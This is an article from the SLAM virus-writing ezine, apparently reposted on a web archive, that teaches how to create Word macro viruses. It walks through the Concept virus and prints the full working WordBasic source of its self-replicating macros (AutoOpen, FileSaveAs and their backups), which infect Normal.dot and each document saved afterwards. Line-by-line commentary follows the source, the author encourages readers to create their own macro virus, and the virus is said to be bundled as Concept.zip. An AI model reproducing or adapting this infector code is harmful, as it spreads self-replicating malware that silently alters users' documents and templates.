Copy Link
Add to Bookmark
Report

SLAM.002: First info about Macro virii (based on the Concept virus)

eZine's profile picture
Published in 
Slam
 · 2 years ago

FIRST INFO ABOUT MACRO VIRII

A computer virus has lots of correspondences with biological virii (plural of virus).
I will present a list with correspondences:

Computer virii                      | Biological virii 
-----------------------------------------------------------------------
Infects other computers. | Infects other people.
|
Tries to destroy or do something | Makes you sick, and have consequents
that isn't nice ;) to others. | like throw up and stuff.
|
A virus waits with striking to get | A virus waits with striking to get
more computers infected. | more people infected.
|
Anti-virus progs helps you (NOT!!) | There are medicines against almost all
with uninfecting you system. | virii.
-----------------------------------------------------------------------


There are lots of more comparisons with biological virii. Imagine...
At the moment there are 2 main types of computer virii:

  1. Virii created in assembler (or other program languages, but most of the time in assembler). Created for Dos or sometimes for windows (Bizatch, etc.)
  2. Virii created in MS-Word macro's (or other programs that have a good macro language) This sort will be the subject of this file.

The second type are the newest virii and spread much more faster then the first type.

Macro virii (the second type) are created with Microsoft Word for Windows 6.0 or higher, you may think how can I create a virus with a MS-Word?
MS-Word has a build in macro language, a macro language is almost the same as a programmer language (such as C++, Pascal, etc.). The MS-WORD macro language is a simple version of Visual Basic (a programmers language. It's not very hard to learn, only I never found the perfect book about Word macros.

An assembler virus (type 1) attaches himself to an executable file such as .EXE and .COM, a Word macro virus (type 2) Doesn't attaches himself to .EXE or .COM files, but to .DOC files (the standard MS-Word type). You might think, how can a .DOC file with text be infected?

See the following picture for more info.

Normal Word Document (.DOC)

    +--------------------+ 
| Text + text-format |
+--------------------+


Word Template (doesn't matter which extension, .DOT is often used)

    +------------------------------------------+ 
| Text + text-format + macros + Word setup |
+------------------------------------------+


Word virii are created in macros, so if you want to create a macro virus you must be sure that the file is saved as a Word template, because in Word templates you can save macros. But the only problem is that Word templates are almost always saved as .DOT. So we must change the FileSaveAs program that it will save Word templates as .DOC.


What is a macro?
A macro is a sort of a list of things that MS-Word will do auto- maticcly when the macro is run.

Maybe it's going a bit fast now, so we'll take it all over now, but if you almost fallen asleap because you already knew everything, go on with SLAM.003 and enjoy...

A summary of what we had till now:

  • There are 2 types of virii:
    • Assembler virii, mostly for DOS
    • Winword virii, a new type of virii created with the macro language of Microsoft Word 6.0 or higher

  • A Word virus is created in a macro, a list of instruction that MS-Word can do automatticly when a macro is run.
  • Word can only save macros in templates so you must make sure that Word saves every infected file as a template.

Ok that was that. We have the basics of a macro virus here. Now we'll go on with a specific macro virus, the Concept macro virus. It was the first macro virus and is probably the most in the wild virus.

In Word you can see if there are any macros installed. You do this with selecting the Tools/Macros. You then get a dialogbox with the names of the macros installed in the Normal.dot, Normal.dot is the template where Word saves its settings in and stores his macros in that are created or copied to the Normal.dot. Because Word automaticly opens the Normal.dot when Word is opened we must make sure to copy the virus macros to the Normal.dot.

If you understand everything till here you can read on. Otherwise you may consider reading it again from the start.

We'll continue our journey in creating macro virii with looking at the first Word macro virus, Concept. Because Concept is just a simple Word macro virus we'll start with this virus. It's detected by all AV-progs I know about but you must learn to walk before you can do the Polka!


The Concept Macro Virus

Before you going to do all the stuff down here it's good to do the following things:

  • Make a backup of the Normal.dot from \winword\template\normal.dot
  • It's handy to install the WordBasic help file too

Concept uses 5 different macros to infect and spread. The names of these macros are:

  • AAAZAO (a copy of the AutoOpen macro)
  • AAAZFS (becomes the FileSaveAs macro)
  • AutoOpen (is automatically executed when doc is opened)
  • FileSaveAs (changes the fileSaveAs dialog so it will save as a template, but with a .doc extension)
  • PayLoad (is the infection marker, this macro doesn't do anything, it's just for fun)

In word macro virii the following happens when anyone gets infected:

  1. You open an infected template (document)
  2. The AutoOpen macro in the infected template (document) copies all the virus macros from the template (document) to the Normal.dot
  3. The virus macros changes the FileSaveAs dialog so that it will save every (normal) document you want to save but changes it into a template and saves the macros of the virus in the document

This happens with almost every macro virii. There are exclusions, but I will explain these in later files.

Back to Concept.
The virus uses 5 macros, but if you look in an infected document (not the Normal.dot), with Tools/Macros you will see only 4. You might think: How the fuck is that possible???
It's not very hard to explain:
It's quite logical. If you use an infected document (not the Normal.dot) you'll see the 4 macros:

  • AAAZAO
  • AAAZFS
  • AutoOpen
  • PayLoad

And if you look at an infected Normal.dot you'll see:

  • AAAZAO
  • AAAZFS
  • FileSaveAs
  • PayLoad

You see that there isn't any AutoOpen macro in the Normal.dot. That's because it isn't necessary, because nobody opens his Normal.dot manually. But if it's opened if you start Word the AutoOpen macro won't run automatically. We'll come to this later. But in the infected document the AutoOpen macro is probably the most important macro. Because it does the actual infection of the Normal.dot. I'll show you later how the macro works. The PayLoad macro in the infected document is the same as in the infected Normal.dot and only contains a message:
"That's enough to prove my point"
It further has no use.
The AAAZAO is a copy of the AutoOpen macro and the AAAZFS macro is a copy of the FileSaveAs macro. The use of these macros are explained in the drawing down here.

The macros that are copied to the Normal.dot when AutoOpen is executed

    +--Infected document---+ 
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+ |
| AutoOpen | | |
| PayLoad -------------+--+ | |
+----------------------+ | | |
| | |
+--Normal.dot----------+ | | |
| PayLoad <------------+--+ | |
| FileSaveAs <---------+-----+ |
| AAAZFS <-------------+--------+-|
| AAAZAO <-------------+--------+-|
+----------------------+


You saw that AAAZFS is copied to AAAZFS and to FileSaveAs and AutoOpen was not. That's because it is running. You cannot copy any macro that is running. That's why FileSaveAs isn't copied when saving a document (and infect the document) because FileSaveAs is running. In stead of FileSaveAs, AAAZFS is copied. AAAZFS has the same contents as FileSaveAs.

As you will see later.
Because AutoOpen isn't copied to the Normal.dot you must have another macro that has the same contents as the AutoOpen macro to infect other documents that aren't infected yet, because the infected document must have an AutoOpen macro in it to infect other computers. Got it? Here's another drawing to show you what happens if you save an uninfected document, with the FileSaveAs macro.

The macros that are copied to the uninfected document when FileSaveAs is executed.

    +--Normal.dot----------+ 
| AAAZAO --------------+--------+
| AAAZFS --------------+-----+ |
| FileSaveAs | | |
| PayLoad -------------+--+ | |
+----------------------+ | | |
| | |
+--Uninfected document-+ | | |
| PayLoad <------------+--+ | |
| AAAZFS <-------------+-----+ |
| AutoOpen <-----------+--------+-|
| AAAZAO <-------------+--------+-|
+----------------------+


I hope you got it. Now the final thing before we going to see the macros and their contents of the Concept macro virus.


Every virus must have a see-if-already-infected-thing in it. Because if it tries to infect a file for the second time you will see all kind off strange error messages. This counts for assembler virii and ofcourse for Word macro virii.


Source Code

This is the source code of the macro virus Concept, it was the first macro virus created ever. After the source I'll explain what it excactly does.
Everything behind an " ' " are comments by me.

The Word Macro Virus Concept

'The macro AAAZAO (the backup of AutoOpen)

Sub MAIN 
On Error Goto Abort 'a build in errorhandler
iMacroCount = CountMacros(0, 0) 'count all macros
'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1 'check if payload is in it yet
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1 'FileSaveAs already installed?
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad" 'infect the Normal.dot
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
MsgBox Str$(iWW6IInstance + 1) 'display a messagebox
End If
Abort:
End Sub

'The macro AAAZFS (the backup of FileSaveAs)

Sub MAIN 
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail 'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$ 'saves the documents with the macros
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done

Bail:
If Err <> 102 Then 'if an error comes up just display the
FileSaveAs dlg 'FileSaveAs dialog
End If
Done:
End Sub

The macro AutoOpen

Sub MAIN 
On Error Goto Abort 'build in errorhandler
iMacroCount = CountMacros(0, 0) 'count the macros
'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1 'check if PayLoad is in already
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1 'FileSaveAs already installed?
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad" 'infect the Normal.dot
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
MsgBox Str$(iWW6IInstance + 1) 'display a messagebox
End If
Abort:
End Sub

The macro FileSaveAs

Sub MAIN 
'this becomes the FileSaveAs for the global template
Dim dlg As FileSaveAs
On Error Goto bail 'build in errorhandler
GetCurValues dlg
Dialog dlg
If dlg.Format = 0 Then dlg.Format = 1
sMe$ = FileName$()
sTMacro$ = sMe$ + ":AutoOpen"
MacroCopy "Global:AAAZAO", sTMacro$ 'infects Normal.dot
sTMacro$ = sMe$ + ":AAAZAO"
MacroCopy "Global:AAAZAO", sTMacro$
sTMacro$ = sMe$ + ":AAAZFS"
MacroCopy "Global:AAAZFS", sTMacro$
sTMacro$ = sMe$ + ":PayLoad"
MacroCopy "Global:PayLoad", sTMacro$
FileSaveAs dlg
Goto Done

Bail:
If Err <> 102 Then 'If an error comes up just display
FileSaveAs dlg 'the FileSaveAs dialog
End If
Done:
End Sub


Don't quit now if you don't understand a thing of it, most of you will not understand it right now. I will discuss the macros now.

You probably have seen that the macros FileSaveAs and AAAZFS are the same.
The macros AutoOpen and AAAZAO are the same to. It's quite logical because the AAAZFS gets copied to the FileSaveAs and the AAAZAO is copied to the AutoOpen macro. So because of the two same macros I will only discuss two macros with you, the FileSaveAs and AutoOpen, more is not neccesary. If your Normal.dot has the Concept macros you can easily watch them by clicking Tools/Macro---->"choose macro you want to view" and click Edit

Here follows the macros AutoOpen and FileSaveAs again only now with more explanation, I hope you get it now.

>comment from me about the line above


The Macro FileSaveAs

>This all happens when you click File/Save As... in Word.

---------------------------------------------------------------- 
Sub MAIN


>Every macro begins with this and ends with "End Sub".

Dim dlg As FileSaveAs


>Set the dialog as FileSaveAs.

On Error Goto bail


>If an error occurs goto bail, see "bail:" down the macro where it goes.

GetCurValues dlg


>Gets the cursur place, and other settings of the cursur, from the dialog (FileSaveAs dialog).

Dialog dlg 

If dlg.Format = 0 Then dlg.Format = 1


>If dialog format is 0 then change it to 1.

sMe$ = FileName$()


>The string sMe$ is the active document in Word.

sTMacro$ = sMe$ + ":AutoOpen"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AutoOpen".

MacroCopy "Global:AAAZAO", sTMacro$


>Copies the macro AAAZAO from the Normal.dot (global template) to the sTMacro$ (active document + :AutoOpen).

sTMacro$ = sMe$ + ":AAAZAO"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".

MacroCopy "Global:AAAZAO", sTMacro$


>Copies the macro AAAZAO from the Normal.dot (global template) to the sTMacro$ (active document + :AAAZAO).

sTMacro$ = sMe$ + ":AAAZFS"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

MacroCopy "Global:AAAZFS", sTMacro$


>Copies the macro AAAZFS from the Normal.dot (global template) to the sTMacro$ (active document + :AAAZFS).

sTMacro$ = sMe$ + ":PayLoad"


>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".

MacroCopy "Global:PayLoad", sTMacro$


>Copies the macro PayLoad from the Normal.dot (global template) to the sTMacro$ (active document + :Payload).

FileSaveAs dlg


>Shows the FileSaveAs Dialog.

Goto Done


>If everything is gone good goto Done.

Bail:


>This is where the macro jumps to when an error occurs (see On error goto bail, at the top of this macro).

If Err <> 102 Then 
FileSaveAs dlg


>If the error number is different to 102 then the macro will show the FileSaveAs Dialog.

End If


>The end of an "if" instruction see above (If err <> 102 then FileSaveAs dlg).

Done:


>This is where the macro goes to when everything has gone good. The "goto done" instruction does this.

End Sub


>Every Word macro stops with this.
----------------------------------------------------------------


The Macro AutoOpen

>This all happens when an infected document is opened.

---------------------------------------------------------------- 
Sub MAIN


>Every macro begins with this and ends with "End Sub".

	On Error Goto Abort


>If an error occurs goto abort, see "abort:" down the macro where it goes.

	iMacroCount = CountMacros(0, 0)


>Count how many macros are in Normal.dot (global template).

	For i = 1 To iMacroCount


>A loop in the macro that runs again if "Next i" instruction is executed.
>Because iMacroCount is the amount of macros in the Normal.dot it will check all macros.

		If MacroName$(i, 0, 0) = "PayLoad" Then 
bInstalled = - 1


>If Macro name is PayLoad then bInstalled is - 1

		End If


>The end of an "if" instruction.

		If MacroName$(i, 0, 0) = "FileSaveAs" Then 
bTooMuchTrouble = - 1


>If Macro name is FileSaveAs then bTooMuchTrouble = - 1

		End If


>The end of an "if" instruction.

	Next i


>The "Next i" instruction that tells the for...next loop to return to the for...next loop if i is more then already done.

	If Not bInstalled And Not bTooMuchTrouble Then


>If bInstalled is not 0 and if bTooMuchTrouble is not 0 then do everything below this.

                iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))


>Sets the iWW6IInstance string as Val(GetdocumentVar$("WW6Infector"))
>This is not that important because it's only used for the message box below.

		sMe$ = FileName$()


>The string sMe$ is the active document in Word.

		sMacro$ = sMe$ + ":Payload"


>The string sTMacro$ is the same as sMe$ (the active document) + ":PayLoad".

		MacroCopy sMacro$, "Global:PayLoad"


>Copies the macro PayLoad (sMacro$) from the active infected document to the global template (most of the times Normal.dot).

		sMacro$ = sMe$ + ":AAAZFS"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

		MacroCopy sMacro$, "Global:FileSaveAs"


>Copies the macro AAAZFS (sMacro$) from the active infected document to the global template (most of the times Normal.dot) with the name FileSaveAs.

		sMacro$ = sMe$ + ":AAAZFS"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZFS".

		MacroCopy sMacro$, "Global:AAAZFS"


>Copies the macro AAAZFS (sMacro$) from the active infected document to the global template (most of the times Normal.dot).

		sMacro$ = sMe$ + ":AAAZAO"


>The string sTMacro$ is the same as sMe$ (the active document) + ":AAAZAO".

		MacroCopy sMacro$, "Global:AAAZAO"


>Copies the macro AAAZAO (sMacro$) from the active infected document to the global template (most of the times Normal.dot).

		SetProfileString "WW6I", Str$(iWW6IInstance + 1)


>Set the profile string "WW6I" to Str$(iWW6IInstance + 1).
>The actual thing done here is put a 1 in Str$(iWW6IInstace + 1)
>This isn't that important because it is only used to place the "1" in the message box below.

		MsgBox Str$(iWW6IInstance + 1)


>This displays a message box containing the Str$(iWW6IInstance + 1).
>Because Str$(iWW6IInstance + 1) is "1" the message box just displays a "1".

	End If


>The end of the "if" instruction "If not bInstalled and not bTooMuchTrouble".

Abort:


>This is the place where the macro goes when an error occurs.

End Sub


>Every Word macro stops with this.

----------------------------------------------------------------


The Macro virus Concept is included with this SLAM issue in the file Concept.zip


Enjoy creating your first macro virus and learn from the WordBasic help file and books. You can read on with the mag if you want but it's probably better if you first learn something more about the Word macro language WordBasic.


--- Neophyte ---

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT